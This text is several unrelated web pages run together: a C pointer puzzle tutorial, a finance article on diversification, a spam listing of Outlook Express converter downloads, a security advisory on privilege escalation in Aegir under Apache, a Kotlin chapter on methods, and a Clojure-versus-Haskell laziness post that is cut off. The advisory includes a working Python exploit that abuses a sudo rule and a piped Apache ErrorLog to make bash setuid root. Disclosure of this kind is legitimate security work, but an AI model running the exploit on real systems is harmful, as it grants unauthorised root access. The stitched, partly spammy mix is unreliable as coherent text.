This is a long one. If you want to ease yourself into it, go and read the other ones for today which are much shorter and then come back to this one. Seriously - it’s a doozy. Pointers, one of the toughest part of C, is what we’ll be tackling today. So you’ve had the past week to wrestle with pointers on your own, and no doubt you’ve all become something of self-made experts on the subject. So let’s have a rather simple warm-up puzzle. So what’s the output of this file? #include <stdio.h> int main() { int a = 5, b = 15; int *p1, *p2; p1 = &a; p2 = &b; *p1 = 10; *p2 = *p1; p1 = p2; *p1 = 20; printf("a: %d ", a); printf("b: %d\n", b); printf("p1: %p p2: %p\n", p1, p2); return 0; } Did you get it? a: 10 b: 20 p1: 0x7fff58bbd754 p2: 0x7fff58bbd754 Of course, the particular pointer locations are irrelevant except in that p1 and p2 should be the same value; since the operating system is what allocates memory, these values should most likely be different each time you run the program. But in case you didn’t quite get the right answer, let’s break it down. What’s a pointer? A pointer is just a variable that represents a location in memory. So after initializing a and b to 5 and 15 respectively, we create two addresses p1 and p2. How do we assign the two pointers to the addresses in which a and b are stored? We create a reference with the & operator. The error most novices make is that the reference operator can never be on the left side of the assignment operator. This makes logical sense - you can’t change the address in which something is stored. All you can do is instead copy the same information held at that address to a new location, and then later free whatever was held in the original location. Okay, so far so good. The * operator is known as dereferencing a pointer. It means we’re accessing not the address represented by the pointer, but the value in memory represented by that address. Unlike the reference operator, the dereference operator can be present on either side of the assignment operator. So *p1 accesses the value that a stores; in this case, we’re functionally resetting a to be 10, and similarly we set b to the same value. Here is the part that may have confused some of you. We set p1 to point to the same address to which p2 points, so they are both manipulating the area of memory in which b is stored. Then, we set that value to be 20, thus altering b. And that’s it! So now that we’ve had this quick three-minute review of pointers, we’re ready for some better puzzles. This puzzle tests disambiguation of pointers. Fundamentally, we’re going to explore an array of type versus pointer to type. Here’s pointer_test.c. What’s the output? #include <stdio.h> int main(int argc, const char *argv[]) { int a[5] = { 1, 2, 3, 4, 5 }; int *ptr = (int *)(&a + 1); printf("%d %d\n", *(a + 1), *(ptr - 1)); return 0; } You may remember from the lecture that the variable that represents an array is actually a pointer referencing the zero-eth element in that array. So in this example, a is actually a pointer referencing a[0] - in this case, 1. By that logic, a + 1 merely references the next integer - a[1]; thus, the first integer printed is 2. That’s the easy part. The next one is a little tougher. If you treated *ptr as a simple pointer to an integer – like you treated a – you’d be tempted to give the following incorrect explanation: Since ptr points to the location of a, a + 1 merely points to the location of a[1]; thus, ptr - 1 goes back to referencing a[0]. So the second number printed must be 1. Nope! The trick here is that ptr is not a pointer to an integer. It is a pointer to an array – which is entirely different. Pointer arithmetic on these two variables works entirely differently. A pointer to an integer, when incremented, will simply move up in memory by the number of bytes an integer represents. A pointer to an array, however, will move up in memory by the length of the array when incremented. Thus, when incremented, it moves up by five elements - to the slot in memory right after 5 in the array a. When decremented, however, printf is treating the output as a pointer to an integer, and not a pointer to an array. So when we subtract 1 inside the printf statement, ptr references a[4] instead of a[5], and dereferencing that gives us 5. So the output is 2 5. Phew! This puzzle is testing a concept known as pointer disambiguation, where the same pointer can be treated differently depending on the context. Let’s warm up our disambiguation skills with a little puzzle: What are the differences between the following three declarations. int* arr1[8]; int (*arr2)[8]; int *(arr3[8]); The first is an array of integer pointers - specifically, an array of length eight. The second is a pointer to an array of integers. And the third is the same as the first! So how the heck do we start evaluating these things? The difference here is critical. Operator precedence can be a rather esoteric subject – especially when function pointers get involved, as you’ll see next time – but there are a couple simple rules that can help you learn rather quickly how this works. As the C Bible (K&R, as you all should know well by now) suggests using cdecl for any very complicated situations. It is wonderful, and you should definitely consider it. Order of operations seems fairly obvious, and in general we encounter fairly trivial examples. But what about when you get something like the following: char *(*(**foo[][8])())[]; [ ]) and “function returning” ( ( )) have higher precedence than “pointer to” ( *). foo is... foo is... int Let’s go through some examples. long **foo[7]; As we go through the example, I’ll strikeout whatever we’ve delt with. We start with the variable, and end with the type. foo is ... long. Okay, simple enough. Now let’s fill in the middle. long ** foo[7]; “Array of” has the highest precedence, so we can and must go right. This gives us the sentence foo is array of 7 long. long ** foo[7] Now, we’ve gone as far to the right as possible. This means we have no choice but to go left. foo is array of 7 pointer to long takes care of the first “pointer to”, but we have on last pointer. Here is the final result: foo is array of 7 pointer to pointer to long. Think you’ve got the hang of it? Let’s try some really hairy examples to really get it down. char * ( * ( * *foo [][8])())[]; We start as usual, with the variable and the simple type: foo is ... char. Sweet, let’s see what we have left. char * ( * ( * * foo [][8])())[] Since foo touches both “pointer to” and “array of”, we go right as much as we can. This gives us: foo is array of array of 8 ... char char * ( * ( * * foo [][8])())[] Okay, now we have no choice but to go left. It has two “pointer to” phrases to add: foo is array of array of 8 pointer to pointer to ... char Leaving this: char * ( * ( * *foo [][8])())[] What do we do now!? There seems to be an empty set of parentheses? It must be a function call! This involves pointers to functions. Remember, we try and go right when we can. On the right is a function call, and on the left is a “pointer to”. Remember our rule – “function returning” has higher precedence. So here is our new sentence: foo is array of array of 8 pointer to pointer to function returning ... char This leaves us with the following: char * ( * ( * *foo [][8]) () )[] We would like to go right, but we have a set of parentheses that block our way. As you know, parens have a much higher precedence than anything else, so we must oblige and go left. This gives us the following: foo is array of array of 8 pointer to pointer to function returning pointer to ... char Which gives us this left over: char * ( * ( * * foo [][8])() ) [] So all that’s left is an “array of” and a “pointer to”; as you well know, we can go right and then left, finishing off our sentence. That gives us the final result – the following mouthful: foo is array of array of 8 pointer to pointer to function returning pointer to array of pointer to char Wow! Thought we were done? We’re just getting started. What we say in the more complicated example there was a function pointer – a pointer to a function. These nasty beasts are unique to C; in higher languages like C++, you should use polymorphism and virtual functions; thus, function pointers have been exclusive to C. Lucky you. Why do we have pointers to functions? There are lots of cases where it’s more useful to design a function to be general purpose; this way, the function you’re writing can accept any function as a parameter and simply call that function. The most common example is sorting. Your sort function can take a compare function as a parameter – this way, you can write seven small compare functions and just a single sorting function, rather than seven long sorting functions. This follows good coding design of factoring out code as well. Let’s start with a simple example. void (*foo)(int); Here, foo is a pointer to a function that takes a single argument, an int, and returns void. The tip to make it easier is that you’re just writing out the function declaration but surrounding the function name by a set of parens. So foo would be declared like this: void foo(int a); Pretty simple! What about this? void *(*foo)(int *); Again, re-writing the function header helps. void *foo (int * a); One interesting thing about function pointers is that the reference operator ( &) becomes optional, as does the dereference ( *). Because why not. Pointers were too simple anyways. void foo(int a) { return a; } int main() { void (*func)(int); func = foo; func = &foo; func(5); (*func)(5); return 0; } Both ways of assigning func are legal, and both ways of calling func are also legal. Here are some guidelines to keep in mind when talking about pointers and specifically function pointers: void *foo; // legal void foo(); // legal void foo; // not legal void foo[]; // not legal char foo[1][2][3][4][5] // legal char foo[] // legal char foo[][5] // legal char foo[5][] // not legal Functions cannot return arrays; they can return pointers, and they can return pointers to arrays, but they cannot return arrays. Functions cannot return functions. (We need to go deeper.) Cannot have an array of functions. But with function pointers, come abstract declarators. These wonderful little creatures are used in two places: casts, and arguments for sizeof. They look something like this: int ( * ( * ) ( ) ) ( ) This is another wonderful moment of sublime . It seems unfair, certainly. I told you to always start at the variable name, which led to the logical conclusion of giving you an example without a variable name. Put away your inhaler and calm down. There are four rules that govern where a variable can be: There’s actually only two places in the given example that a variable can be using those syntax rules. int ( * ( * x ) x ( ) ) ( ) The two x’s represent the two possible locations of a variable. A quick look back at the fourth rule above tells us that there’s only one location, so we can read the abstract declarator as the following: int (*(*foo)())() which translates to: foo is a pointer to function returning pointer to function returning int So, after all this advice, when you’re reading some truly advanced C code, you won’t freak out when you see this: BOOL (__stdcall *foo)(...); You’ll think - hey! This is simple – foo is a pointer to a __stdcall function returning BOOL . Piece of cake. I highly recommend you read this guide - it’s wonderful. Multidimensional pointers aren’t too difficult. Let’s have a three dimensional array buffer, where each of the dimensions are 10. We could directly index into it: char buffer[3][4][5]; Or we could use pointers *( *( *( buffer + 3) + 4) + 5); Here, buffer is a triple pointer; adding 3 moves it over to the third triple pointer. Dereferencing that gives us a double pointer, and adding four to that gives us the fourth double pointer. Dereferencing that gives us just a regular pointer, and adding five gives us the fifth pointer. Finally, one last dereference gives us just a regular char. That’s pretty much it! Here’s one puzzle just to make sure you really understood the concept. int main() { char arr[5][7][6]; char (*p)[5][7][6] = &arr; printf("%d\n", (&arr + 1) - &arr); printf("%d\n", (char *)(&arr + 1) - (char *)&arr); printf("%d\n", (unsigned)(arr + 1) - (unsigned)arr); printf("%d\n", (unsigned)(p + 1) - (unsigned)p); return 0; } The output should be 1 210 42 210 Why does this program give an error? #include <stdio.h> void foo(const char **p) { } int main(int argc, char **argv) { foo(argv); return 0; } This program uses a const pointer. This simply means that while the pointer itself can be changed, the memory it touches cannot change in value. In other words, it’s not the pointer that’s a const, but rather what it points to. This is why the const appears before the *. If you put the const after the * (like int * const p_int = &x;) then you get a regular old pointer to an int, but this time the value of p_int cannot change. Thus, it’s the pointer that’s a const. Here is a hint to the for the code example above. char const c = 'a'; char* p = 0; char const** pp = &p; // not allowed in C *pp = &c; // p now points to c. *p = 'b'; // changing a const value! The first code snippet would work perfectly fine, without any warning, if p were a single pointer instead of a double pointer. So why does this break with double pointers? This is known as const correctness in C. Although it is possible to cast from char * to const char * without warning, C will prohibit char ** to const char ** casting. So why would this be prohibited? Imagine p is a char * – if so, logically, it could be used to modify whatever it’s pointing at. Imagine you have another pointer, pp that points to p. You could use pp to assign to p the address of a const char - you could even use p to modify the const char, which might even be in read-only memory! So why use const? One misconception is that this can be utilized to make further optimizations. However, this is rarely the case. Usually, this is generally for conceptual clarity and readability. Here is some further explanations of this issue in C. Oh, of course Alex Alain has another great tutorial. Here are some awesome resources about pointer arithmetic and an awesome video series by Stanford University.
https://cs50.notablog.xyz/puzzle/Puzzle4.html
CC-MAIN-2018-43
en
refinedweb
In finance, diversification is the process of allocating capital in a way that reduces the exposure to any one particular asset or risk. A common path towards diversification is to reduce risk or volatility by investing in a variety of assets. If asset prices do not change in perfect synchrony, a diversified portfolio will have less variance than the weighted average variance of its constituent assets, and often less volatility than the least volatile of its constituents.[1] Diversification is one of two general techniques for reducing investment risk. The other is hedging. The simplest them. On the other hand, having a lot of baskets may increase costs. In finance, an example of an undiversified portfolio is to hold only one stock. This is risky; it is not unusual for a single stock to go down 50% in one year. It is less common for a portfolio of 20 stocks to go down that much, especially if they are selected at random. If the stocks are selected from a variety of industries, company sizes and asset types it is even less likely to experience a 50% drop since it will mitigate any trends in that industry, company class, or asset type..[2][3] If the prior expectations of the returns on all assets in the portfolio are identical, the expected return on a diversified portfolio will be identical to that on an undiversified portfolio. Some assets will do better than others; but since one does not know in advance which assets will perform better, this fact cannot be exploited in advance. The return on a diversified portfolio can never exceed that of the top-performing investment, and indeed will always be lower than the highest return (unless all returns are identical). Conversely, the diversified portfolio's return will always be higher than that of the worst-performing investment. So by diversifying, one loses the chance of having invested solely in the single asset that comes out best, but one also avoids having invested solely in the asset that comes out worst. That is the role of diversification: it narrows the range of possible outcomes. Diversification need not either help or hurt expected returns, unless the alternative non-diversified portfolio has a higher expected return.[4] There is no magic number of stocks that is diversified versus not. Sometimes quoted is 30, although it can be as low as 10, provided they are carefully chosen. This is based on a result from John Evans and Stephen Archer.[5] Similarly, a 1985 book reported that most value from diversification comes from the first 15 or 20 different stocks in a portfolio.[6] More stocks give lower price volatility. Given the advantages of diversification, many experts[who?] recommend maximum diversification, also known as "buying the market portfolio". Unfortunately, identifying that portfolio is not straightforward. The earliest definition comes from the capital asset pricing model which argues the maximum diversification comes from buying a pro rata share of all available assets. This is the idea underlying index funds. Diversification has no maximum so long as more assets are available.[7] Every equally weighted, uncorrelated asset added to a portfolio can add to that portfolio's measured diversification. When assets are not uniformly uncorrelated, a weighting approach that puts assets in proportion to their relative correlation can maximize the available diversification. "Risk parity" is an alternative idea. This weights assets in inverse proportion to risk, so the portfolio has equal risk in all asset classes. This is justified both on theoretical grounds, and with the pragmatic argument that future risk is much easier to forecast than either future market price or future economic footprint.[8] "Correlation parity" is an extension of risk parity, and is the solution whereby each asset in a portfolio has an equal correlation with the portfolio, and is therefore the "most diversified portfolio". Risk parity is the special case of correlation parity when all pair-wise correlations are equal.[9] One simple measure of financial risk is variance of the return on the portfolio. Diversification can lower the variance of a portfolio's return below what it would be if the entire portfolio were invested in the asset with the lowest variance of return, even if the assets' returns are uncorrelated. For example, let asset X have stochastic return and asset Y have stochastic return , with respective return variances and . If the fraction of a one-unit (e.g. one-million-dollar) portfolio is placed in asset X and the fraction is placed in Y, the stochastic portfolio return is . If and are uncorrelated, the variance of portfolio return is . The variance-minimizing value of is , which is strictly between and . Using this value of in the expression for the variance of portfolio return gives the latter as , which is less than what it would be at either of the undiversified values and (which respectively give portfolio return variance of and ). Note that the favorable effect of diversification on portfolio variance would be enhanced if and were negatively correlated but diminished (though not eliminated) if they were positively correlated. In general, the presence of more assets in a portfolio leads to greater diversification benefits, as can be seen by considering portfolio variance as a function of , the number of assets. For example, if all assets' returns are mutually uncorrelated and have identical variances , portfolio variance is minimized by holding all assets in the equal proportions .[10] Then the portfolio return's variance equals = = , which is monotonically decreasing in . The latter analysis can be adapted to show why adding uncorrelated volatile assets to a portfolio,[11][12] thereby increasing the portfolio's size, is not diversification, which involves subdividing the portfolio among many smaller investments. In the case of adding investments, the portfolio's return is instead of and the variance of the portfolio return if the assets are uncorrelated is which is increasing in n rather than decreasing. Thus, for example, when an insurance company adds more and more uncorrelated policies to its portfolio, this expansion does not itself represent diversification—the diversification occurs in the spreading of the insurance company's risks over a large number of part-owners of the company. The expected return on a portfolio is a weighted average of the expected returns on each individual asset: where is the proportion of the investor's total invested wealth in asset . The variance of the portfolio return is given by: Inserting in the expression for : Rearranging: where is the variance on asset and is the covariance between assets and . In an equally weighted portfolio, . The portfolio variance then becomes: where is the average of the covariances for and is the average of the variances. Simplifying, we obtain As the number of assets grows we get the asymptotic formula: Thus, in an equally weighted portfolio, the portfolio variance tends to the average of covariances between securities as the number of securities becomes arbitrarily large. The capital asset pricing model introduced the concepts of diversifiable and non-diversifiable risk. Synonyms for diversifiable risk are idiosyncratic risk, unsystematic risk, and security-specific risk. Synonyms for non-diversifiable risk are systematic risk, beta risk and market risk. If one buys all the stocks in the S&P 500 one is obviously exposed only to movements in that index. If one buys a single stock in the S&P 500, one is exposed both to index movements and movements in the stock based on its underlying company. The first risk is called "non-diversifiable", because it exists however many S&P 500 stocks are bought. The second risk is called "diversifiable", because it can be reduced by diversifying among stocks. In the presence of per-asset investment fees, there is also the possibility of overdiversifying to the point that the portfolio's performance will suffer because the fees outweigh the gains from diversification. The capital asset pricing model argues that investors should only be compensated for non-diversifiable risk. Other financial models allow for multiple sources of non-diversifiable risk, but also insist that diversifiable risk should not carry any extra expected return. Still other models do not accept this contention.[13] In 1977 Edwin Elton and Martin Gruber[14] worked out an empirical example of the gains from diversification. Their approach was to consider a population of 3,290 securities available for possible inclusion in a portfolio, and to consider the average risk over all possible randomly chosen n-asset portfolios with equal amounts held in each included asset, for various values of n. Their results are summarized in the following table. The result for n=30 is close to n=1,000, and even four stocks provide most of the reduction in risk compared with one stock. In corporate portfolio models, diversification is thought of as being vertical or horizontal. Horizontal diversification is thought of as expanding a product line or acquiring related companies. Vertical diversification is synonymous with integrating the supply chain or amalgamating distributions channels. Non-incremental diversification is a strategy followed by conglomerates, where the individual business lines have little to do with one another, yet the company is attaining diversification from exogenous risk factors to stabilize and provide opportunity for active management of diverse resources. Diversification is mentioned in the Bible, in the book of Ecclesiastes which was written in approximately 935 B.C.:[15] Diversification is also mentioned in the Talmud. The formula given there is to split one's assets into thirds: one third in business (buying and selling things), one third kept liquid (e.g. gold coins), and one third in land (real estate).[] Diversification is mentioned in Shakespeare (Merchant of Venice):[17] The modern understanding of diversification dates back to the work of Harry Markowitz in the 1950s.[18] Manage research, learning and skills at defaultlogic.com. Create an account using LinkedIn to manage and organize your omni-channel knowledge. defaultlogic.com is like a shopping cart for information -- helping you to save, discuss and share.
http://www.defaultlogic.com/learn?s=Diversification_(finance)
CC-MAIN-2018-43
en
refinedweb
express schematics to express pcb Outlook Express Contacts import outlook express to outlook outlook express repair contact list the polar express drawings Forgotten Outlook Express Password conference call express talk american express generetor lotus notes mail outlook express picture it express outlook express cyclic redundancy error Size :9,800K / Freeware Size :670K / Freeware Size :3,922K / Shareware InTransit the FREE award winning easy to use transport job booking, load optimisation, vehicle tracking and customer management system. Transport Software , intransit express , free software , free software com , data transport , Transport Calculator , Transport Management , transport systems , Transport Icons InTransit is an easy to use job booking, load optimisation, vehicle tracking and customer management system that consists of two main elements. MS Outlook Express DBX Recovery software is the advance utility to recover Outlook Express emails. You can restore deleted emails of Outlook Express from DBX files with the help of Outlook Express Restore software. . DBX to MSG converter software to convert Outlook Express emails in MSG format. You can transfer from Outlook Express to Outlook. Convert complete Outlook Mailbox into Microsoft Outlook with Outlook Express Restore software. . dbx to msg , dbx to msg converter , convert dbx to msg , dbx to msg conversion , convert outlook express to msg , convert outlook express to outlook Importing Outlook Express mailbox to Outlook has become an easy task with PCVARE Outlook Express Mailbox Converter Tool. The program helps users to convert. transfer Outlook Express mailbox to Outlook 2010. outlook express mailbox to outlook , outlook express mailbox converter , outlook express to outlook , convert outlook express mailbox to outlook , convert outlook express to outlook Extract Outlook Express emails has been rated as #1 Outlook Express Email Extractor tool to extract DBX emails and extract OE emails to EML. Now with Extract Outlook express Emails tool. process for Outlook Express email extraction have become. . extract dbx , extract oe emails , outlook express Thunderbird to Outlook Express Converter allows you easily to convert Thunderbird to Outlook Express easily & effectively. Convert all items - attachments. meta data with Thunderbird to Outlook Express Conver. . thunderbird to outlook express converter , convert thunderbird to outlook express , thunderbird to outlook express , thunderbird to outlook express conversion Export Outlook Express to MS Outlook through advanced and reliable Outlook Express email converter software. This is the best solution to convert Outlook Express to Outlook PST. outlook express email converter , convert outlook express to outlook , outlook express to ms outlook Recover emails from Outlook Express and repair or recover Outlook Express emails and convert Outlook Express emails in multiple formats like MSG. EML and DBX. Outlook Express Recovery software recover deleted emails from Outlook E. . DBX to EML converter is the advance utility to convert Outlook Express emails from DBX to EML, this software perform multiple tasks like conversion, repairing and recovering. Filter: All / Freeware only / Title OS: Mac / Mobile / Linux Sort by: Download / Rating / Update
http://freedownloadsapps.com/s/intransit-express/
CC-MAIN-2018-43
en
refinedweb
TL;DR Find out how we exploited a behavior of Apache while using the limited rights of Aegir user to gain root access. Vulnerability Summary Aegir is a free and open source Unix based web hosting control panelprogram for Application lifecycle management that provides a graphical interface designed to simplify deploying and managing Drupal, WordPress and CiviCRM Web sites. When installing Aegir using official packages, the script aegir3-provision.postinst installs an unsafe sudoer rule, allowing to elevate privileges from the user aegir to root. Credit An independent Security Researcher has reported this vulnerability to SSD Secure Disclosure program. Affected Systems Aegir installations running under Apache Unaffected Systems Aegir installations running under Nginx Vendor Response The vendor released a statement,, that the user aegir should not be used by any untrusted user as well as that customers should migrate to an Nginx setup (which is now the default) to prevent such attacks from being possible. Vulnerability Analysis During the installation of the package aegir3-provision, the scriptaegir3-provision.postinst will create a sudo configuration file in/etc/sudoers.d/aegir: if [ -d /etc/sudoers.d ]; then ucf --debconf-ok /usr/share/drush/commands/provision/example.sudoers /etc/sudoers.d/aegir ucfr aegir-provision /etc/sudoers.d/aegir chmod 440 /etc/sudoers.d/aegir else echo "running an older version of sudo" echo "copy content of /usr/share/drush/commands/provision/example.sudoers into /etc/sudoers for aegir to run properly" fi This file allows the user aegir to call /usr/sbin/apache2ctl (thereference to /etc/init.d/nginx is not relevant here, as the package is not installed by default): aegir ALL=NOPASSWD: /usr/sbin/apache2ctl aegir ALL=NOPASSWD: /etc/init.d/nginx This way, the user aegir can reload apache2‘s configuration to supportnew virtual hosts. Part of this configuration is loaded from aegir‘s homedirectory, as aegir3-provision.postinst creates a symbolic link between/var/aegir/config/apache.conf and /etc/apache2/conf-enabled/aegir.conf: case $WEBSERVER in apache) if [ -d /etc/apache2/conf-enabled ]; then # Apache 2.4 ln -sf $AEGIRHOME/config/$WEBSERVER.conf /etc/apache2/conf-enabled/aegir.conf else # Apache 2.2 ln -sf $AEGIRHOME/config/$WEBSERVER.conf /etc/apache2/conf.d/aegir.conf fi a2enmod ssl rewrite apache2ctl graceful ;; However, configuration files can declare dynamic libraries to be loaded bythe HTTP server and also external error loggers. As described inthe documentation: Piped log processes are spawned by the parent Apache httpd process, and inherit the userid of that process. This means that piped log programs usually run as root. Piped log processes are spawned by the parent Apache httpd process, and inherit the userid of that process. This means that piped log programs usually run as root. By modifying /var/aegir/config/apache.conf to declare a custom ErrorLog,and then reloading the apache2 configuration using sudo /usr/sbin/apache2ctl restart, it will be possible to execute arbitrary commands as root. As /usr/sbin/apache2ctl can also accept various flags to declare additionalconfiguration directives and write to arbitrary files, other ways to elevateprivileges may exist. Temporary workaround Remove the file /etc/sudoers.d/aegir. As Aegir will not be able to reloadthe configuration of apache2, new hosts created on the interface will notbe reachable before a manual reload. Fix (Unofficial) The following changes could be implemented to prevent the privilegeescalation: Demo Exploit #/usr/bin/python2.7 import sys import os COMMAND='/usr/bin/chmod +s /bin/bash' SUDO_RELOAD='/usr/bin/sudo /usr/sbin/apache2ctl restart' APACHE_CONFIG='/var/aegir/config/apache.conf' if not COMMAND and len(sys.argv) != 2: print 'Usage: python2.7 {} <command>'.format(sys.argv[0]) sys.exit(1) with open(APACHE_CONFIG, 'a+') as f: cmd = sys.argv[1] if not COMMAND else COMMAND f.write(''' <VirtualHost *:80> DocumentRoot /var/www/ ErrorLog "|{}" </VirtualHost> '''.format(cmd.replace('"', '\"'))) os.system(SUDO_RELOAD) os.execvp('bash', ['bash', '-p'])
https://ssd-disclosure.com/aegir-with-apache-lpe/
CC-MAIN-2022-40
en
refinedweb
14 Methods properties, which are constants and variables that are part of classes and objects. Methods, as you’ve already seen, are merely functions that reside inside a class or object. In this chapter, you’ll take a closer look at methods. As with properties, you’ll begin to design more complex classes and objects. Method refresher Consider ArrayList.removeAt(). It pops the item at a given index off an instance of an array list: val numbers = arrayListOf(1, 2, 3) numbers.removeAt(numbers.lastIndex) println(numbers) // > [1, 2] Methods like removeAt() help you control the data in the array list. Comparing methods to getters and setters With custom accessors, you saw in the last chapter that you could run code from inside a class within a property definition. That sounds a lot like a method. What’s the difference? It really comes down to a matter of style, but there are a few helpful thoughts to help you decide. Turning a function into a method To explore methods, you will create a simple model for dates called SimpleDate. Be aware that the various Kotlin platforms, such as the JVM and JS, contain production-ready Date classes that correctly handle many of the subtle intricacies of dealing with dates and times. val months = arrayOf( "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December" ) class SimpleDate1(var month:String) fun monthsUntilWinterBreak(from: SimpleDate1): Int { return months.indexOf("December") - months.indexOf(from.month) } class SimpleDate2(var month:String) { fun monthsUntilWinterBreak(from: SimpleDate2): Int { return months.indexOf("December") - months.indexOf(from.month) } } val date2 = SimpleDate2("October") println(date2.monthsUntilWinterBreak(date2)) // > 2 date.monthsUntilWinterBreak() // Error! Introducing this A class definition is like a blueprint, whereas an instance is a real object. To access the value of an instance, you use the keyword this inside the class. // 1 fun monthsUntilWinterBreak(): Int { // 2 return months.indexOf("December") - months.indexOf(this.month) } val date3 = SimpleDate3("September") date3.monthsUntilWinterBreak() // 3 return months.indexOf("December") - months.indexOf(month) Mini-exercise Since monthsUntilWinterBreak() returns a single value and there’s not much calculation involved, transform the method into a property with a customer getter. Object methods Like classes, Kotlin objects defined with the object keyword can have member functions that refer to the object itself. class MyMath { // 1 companion object { fun factorial(number: Int): Int { // 2 return (1..number).fold(1) { a, b -> a * b } } } } // 3 MyMath.factorial(6) // 720 Mini-exercise Add a method to the MyMath class that calculates the n-th triangle number. It will be very similar to the factorial formula, except instead of multiplying the numbers, you add them. Extension methods Sometimes you want to add functionality to a class but don’t want to muddy up the original definition. And sometimes you can’t add the functionality because you don’t have access to the source code. Just as for properties, it is possible to augment an existing class or object (even one you do not have the source code for) by adding methods to it. fun SimpleDate.monthsUntilSummerBreak(): Int { val monthIndex = months.indexOf(month) return if (monthIndex in 0..months.indexOf("June")) { months.indexOf("June") - months.indexOf(month) } else if (monthIndex in months.indexOf("June")..months.indexOf("August")) { 0 } else { months.indexOf("June") + (12 - months.indexOf(month)) } } val date = SimpleDate() date.month = "December" println(date.monthsUntilSummerBreak()) // > 6 fun Int.abs(): Int { return if (this < 0) -this else this } println(4.abs()) // > 4 println((-4).abs()) // > 4 Companion object extensions If your class has a companion object, you can add extension methods to it by using the implicit companion object name Companion, or by using the custom name if the companion object has one. fun MyMath.Companion.primeFactors(value: Int): List<Int> { // 1 var remainingValue = value // 2 var testFactor = 2 val primes = mutableListOf<Int>() // 3 while (testFactor * testFactor <= remainingValue) { if (remainingValue % testFactor == 0) { primes.add(testFactor) remainingValue /= testFactor } else { testFactor += 1 } } if (remainingValue > 1) { primes.add(remainingValue) } return primes } MyMath.primeFactors(81) // [3, 3, 3, 3] Challenges - Given the Circleclass below: import kotlin.math.PI class Circle(var radius: Double = 0.0) { val area: Double get() { return PI * radius * radius } } val months = arrayOf( "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December" ) class SimpleDate(var month:String, var day: Int = 0) { fun advance() { day += 1 } } var date = SimpleDate(month = "December", day = 31) date.advance() date.month // December; should be January! date.day // 32; should be 1! Key points - Methods are behaviors that extend the functionality of a class. - A typical method is a function defined inside of a class or object. - A method can access the value of an instance by using the keyword this. - Companion object methods add behavior to a class instead of the instances of that class. To define a companion object method, you add a function in the class companion objectblock. - You can augment an existing class definition and add methods to it using extension methods. Where to go from here? Methods and properties are the things that make up your classes, instances, and objects. Learning about them as you have these last two chapters is important since you’ll use them all the time in Kotlin.
https://www.raywenderlich.com/books/kotlin-apprentice/v2.0/chapters/14-methods
CC-MAIN-2022-40
en
refinedweb
Laziness: Clojure vs Haskell Last week I punted on randomness, and just made my genetic_search function take a [Double]. While that was convenient, it is unfortunately not as general as I thought at the time. I'm still in the process of learning Haskell, and I got confused between laziness in Clojure and laziness in Haskell. So how do they differ? The one-word answer is "purity", but let me try to expand on that a little bit. Clojure has the "seq" abstraction, which is defined by the two functions first and next, where first gives you an element and next gives you another seq if there are more elements to be had, or nil if there are none. When I think of a lazy list, I think in terms of Clojure seqs, even though Clojure lists are actually not lazy. How is that different from Haskell? In Clojure, a lazy seq is one where the elements are explicitly produced on demand, and then cached. This sounds a lot like laziness in Haskell, except for one crucial difference: Clojure does not mind how these elements are produced, and in particular, whether that involves any kind of side effects. In Haskell, on the other hand, laziness means that the elements of a list will be computed on demand, but that only applies to pure computation. There is no lazy side effect in Haskell. Here is a short Clojure program to illustrate this notion further. This program will ask the user for positive integers and then print a running total. First, we start with a seemingly pure function which, given a possibly lazy seq of numbers, returns its sum so far: (defn sum-so-far [ls] (reductions + 0 ls)) Testing this out yields the expected behaviour: t.core=> (sum-so-far [1 2 3 4 5]) (0 1 3 6 10 15) t.core=> The range function, with no argument, returns an infinite lazy seq of integers, starting with 0. We can use our sum-so-far function on it: t.core=> (take 10 (sum-so-far (range))) (0 0 1 3 6 10 15 21 28 36) t.core=> We can also construct a lazy seq by asking the user for input: (defn read-nums [] (print "Please enter a number: ") (flush) (cons (Integer/parseInt (read-line)) (lazy-seq (read-nums)))) Testing it works as expected: t.core=> (take 5 (read-nums)) Please enter a number: 1 Please enter a number: 2 Please enter a number: 3 Please enter a number: 4 Please enter a number: 5 (1 2 3 4 5) t.core=> Similarly, we can easily compute the running sum: t.core=> (take 5 (sum-so-far (read-nums))) Please enter a number: 1 Please enter a number: 2 Please enter a number: 3 Please enter a number: 4 (0 1 3 6 10) t.core=> So we have this one function, sum-so-far, that can handle any Clojure seq, regardless of how it is processed, and produces a new seq itself. Such a function is better thought of as a filter acting on a stream than as a function taking an argument and returning a result. Let's look at the Haskell equivalent. The sum-so-far function seems easy enough: sum_so_far :: [Int] -> [Int] sum_so_far is = loop 0 is where loop :: Int -> [Int] -> [Int] loop sum [] = [sum] loop sum (h:t) = sum : loop (sum + h) t I don't know if Haskell has a direct equivalent to Clojure's reductions, but that's not the point here and it's easy enough to code our own. This obvisouly works as intended on both finite and infinite lists: *Main> sum_so_far [1, 2, 3, 4, 5] [0,1,3,6,10,15] *Main> let ints = 1:map (+1) ints *Main> take 10 $ sum_so_far ints [0,1,3,6,10,15,21,28,36,45] *Main> But what about read-nums? It's not too hard to replicate the beginning of the function: read_nums :: IO [Int] read_nums = do int <- read <$> getLine return int : ??? How can we replace those ???? Well, the : ("cons") function needs a list as its second argument, so we could try constructing that: read_nums :: IO [Int] read_nums = do int <- read <$> getLine tl <- read_nums return $ int : tl That typechecks. But the whole point of monads is to sequence computation: there is no way we can reach the return line without having first produced the entire tl, and thus we're not lazy anymore and can't pile on more processing on top of this. What other option do we have? Perhaps Hoogle knows of a functiont that would help here? The type we'd need would look something like: Int -> IO [Int] -> IO [Int] so we could replace : and use that instead. Hoogle does find a result for that, but it's not quite what we need here. We could of course write a function with that signature easily enough: ignore_tl :: Int -> IO [Int] -> IO [Int] ignore_tl i _ = pure [i] but that's obviously not what we want. Are we stuck? Let's take a step back. The solution here is to realize that Clojure seqs are not the same as Haskell lists. Instead of thinking of sum-so-far as a function, let's go back to the idea of thinking of it as a filter between two streams. What would it take to construct such a filter in Haskell? We'd need a type with the following operations: - Produce an element in the "output" stream. - Request an element from the "input" stream. - Let my consumer know that I will not be producing further elements. The decoupling Clojure gives us is to be completely independent of how the input elements are produced and to produce the output elements on-demand. Let's model this a bit more precisely. We need a data definition OnDemand that represents a filter between two streams of elements. The filter could change the type, so we'll make it take two type parameters: an input one and an output one. We start with: data OnDemand input output Next, we need to be able to express "here is an element" and "there are no more elements". We can take a page from the List book and express those exactly like Nil and Cons: = Halt | Out output (OnDemand input output) Finally, we need to be able to ask for a new element, wait for it, and then keep going. This phrasing suggests we need to suspend the current computation to give our supplier the opportunity to manufacture an input, and keep going after that. A generally good way to 